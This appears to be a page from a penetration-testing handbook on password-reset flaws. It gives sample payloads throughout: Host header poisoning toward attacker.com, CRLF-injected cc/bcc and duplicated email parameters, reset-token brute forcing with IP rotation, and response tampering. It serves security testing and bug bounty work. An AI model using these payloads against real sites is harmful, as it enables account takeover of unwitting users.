đź“–
Pentest Book by n3t_hunt3r
  • XSS Filter Evasion and WAF Bypassing Tactics
  • Cloud Pentesting
  • AWS Security Testing
  • Azure Pentesting
  • GCP Pentesting
  • Web Application Pentesting
    • XSS <Cross Site Scripting>
      • PDF Injection <XSS>
      • DOM XSS
      • Server Side XSS <Dynamic PDF>
      • XSS Tools
    • SSRF <Server Side Request Forgery>
    • Open Redirect Vulnerability
    • Command Injection
    • File Upload
    • Rate Limit Bypass Techniques
    • IDOR
    • Web Cache Poisoning /Web Cache Deception
    • CSRF <Cross Site Request Forgery>
    • XPATH injection
    • LDAP Injection
    • JWT Vulnerabilities <Json Web Tokens>
    • CORS - Misconfigurations & Bypass
    • Reset/Forgotten Password Bypass
    • CRLF (%0D%0A) Injection
    • Clickjacking
    • Hostile Domain/Subdomain takeover
    • Server Side Inclusion/Edge Side Inclusion Injection
    • HTTP Request Smuggling / HTTP Desync Attack
    • SAML Attacks
    • OAuth to Account takeover
    • Cross-site WebSocket hijacking (CSWSH)
    • Uncovering CloudFlare
    • Email Header Injection
    • Unicode Normalization vulnerability
    • Registration Vulnerabilities
    • Race Condition
Powered by GitBook
On this page
  • Reset/Forgotten Password Bypass
  • Password Reset Token Leak Via Referrer
  • Account Takeover Through Password Reset Poisoning
  • Account Takeover: Password Reset With Manipualating Email Parameter
  • Full Account Takeover via Changing Email And Password of any User through API Parameters
  • Find out How Password Reset Token is Generated
  • Response manipulation: Replace Bad Response With Good One
  • Session Invalidation in Logout/Password Reset
  • Reset Token expiration Time
  • Extra Checks

Was this helpful?

  1. Web Application Pentesting

Reset/Forgotten Password Bypass

PreviousCORS - Misconfigurations & BypassNextCRLF (%0D%0A) Injection

Last updated 3 years ago

Was this helpful?

Reset/Forgotten Password Bypass

The following techniques recompilation was taken from

Password Reset Token Leak Via Referrer

The HTTP referer is an optional HTTP header field that identifies the address of the webpage which is linked to the resource being requested. The Referer request header contains the address of the previous web page from which a link to the currently requested page was followed

Exploitation

  • Request password reset to your email address

  • Click on the password reset link

  • Dont change password

  • Click any 3rd party websites(eg: Facebook, twitter)

  • Intercept the request in burpsuite proxy

  • Check if the referer header is leaking password reset token.

Impact

It allows the person who has control of particular site to change the user’s password (CSRF attack), because this person knows reset password token of the user.

Reference:

Account Takeover Through Password Reset Poisoning

If you find a host header attack and it’s out of scope, try to find the password reset button!

Exploitation

  • Intercept the password reset request in Burpsuite

  • Add following header or edit header in burpsuite(try one by one)

Host: attacker.com
 Host: target.com
 X-Forwarded-Host: attacker.com
 Host: target.com
 Host: attacker.com
  • Check if the link to change the password inside the email is pointing to attacker.com

Patch

Use $_SERVER['SERVER_NAME'] rather than $_SERVER['HTTP_HOST']

$resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/reset-password.php?token=12345678-1234-1234-1234-12345678901";

Impact

The victim will receive the malicious link in their email, and, when clicked, will leak the user’s password reset link / token to the attacker, leading to full account takeover.

Reference:

Account Takeover: Password Reset With Manipualating Email Parameter

Exploitation

  • Add attacker email as second parameter using &

POST /resetPassword
[...]
email=victim@email.com&email=attacker@email.com
  • Add attacker email as second parameter using %20

POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com
  • Add attacker email as second parameter using |

POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com
  • Add attacker email as second parameter using cc

POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
  • Add attacker email as second parameter using bcc

POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
  • Add attacker email as second parameter using ,

POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"
  • Add attacker email as second parameter in json array

POST /resetPassword
[...]
{"email":["victim@mail.tld","atracker@mail.tld"]}

Reference

Full Account Takeover via Changing Email And Password of any User through API Parameters

Exploitation

  • Attacker have to login with their account and Go to the Change password function

  • Start the Burp Suite and Intercept the request

  • After intercepting the request sent it to repeater and modify parameters Email and Password

POST /api/changepass
[...]
("form": {"email":"victim@email.tld","password":"12345678"})

Reference

No Rate Limiting: Email Bombing

Exploitation

  • Start the Burp Suite and Intercept the password reset request

  • Send to intruder

  • Use null payload

Reference

Find out How Password Reset Token is Generated

Figure out the pattern of password reset token

If it

  • Generated based Timestamp

  • Generated based on the UserID

  • Generated based on email of User

  • Generated based on Firstname and Lastname

  • Generated based on Date of Birth

  • Generated based on Cryptography

Use Burp Sequencer to find the randomness or predictability of tokens.

Response manipulation: Replace Bad Response With Good One

Look for Request and Response like these

HTTP/1.1 401 Unauthorized
(“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”)

Change Response

HTTP/1.1 200 OK
(“message”:”success”,”statusCode:200,”errorDescription”:”Success”)

Reference

Using Expired Token

  • Check if the expired token can be reused

Brute Force Password Rest token

Try to bruteforce the reset token using Burpsuite

POST /resetPassword
[...]
email=victim@email.com&code=$BRUTE$
  • Use IP-Rotator on burpsuite to bypass IP based ratelimit.

Reference

Try Using Your Token

  • Try adding your password reset token with victim’s Account

POST /resetPassword
[...]
email=victim@email.com&code=$YOUR_TOKEN$

Reference

Session Invalidation in Logout/Password Reset

When a user logs out or reset his password, the current session should be invalidated. Therefore, grab the cookies while the user is logged in, log out, and check if the cookies are still valid. Repeat the process changing the password instead of logging out.

Reset Token expiration Time

The reset tokens must have an expiration time, after it the token shouldn't be valid to change the password of a user.

Extra Checks

  • Long password (>200) leads to DoS

  • Append second email param and value

Use and analyze the callback

User carbon copy email=%0a%0dcc:

https://hackerone.com/reports/342693
https://hackerone.com/reports/272379
https://hackerone.com/reports/737042
https://medium.com/@rubiojhayz1234/toyotas-password-reset-token-and-email-address-leak-via-referer-header-b0ede6507c6a
https://medium.com/@shahjerry33/password-reset-token-leak-via-referrer-2e622500c2c1
https://hackerone.com/reports/226659
https://hackerone.com/reports/167631
https://www.acunetix.com/blog/articles/password-reset-poisoning/
https://pethuraj.com/blog/how-i-earned-800-for-host-header-injection-vulnerability/
https://medium.com/@swapmaurya20/password-reset-poisoning-leading-to-account-takeover-f178f5f1de87
https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be
https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/
https://twitter.com/HusseiN98D/status/1254888748216655872
https://medium.com/@adeshkolte/full-account-takeover-changing-email-and-password-of-any-user-through-api-parameters-3d527ab27240
https://hackerone.com/reports/280534
https://hackerone.com/reports/794395
https://medium.com/@innocenthacker/how-i-found-the-most-critical-bug-in-live-bug-bounty-event-7a88b3aa97b3
https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
username@burp_collab.net
victim@mail.com
hacker@mail.com
https://anugrahsr.github.io/posts/10-Password-reset-flaws/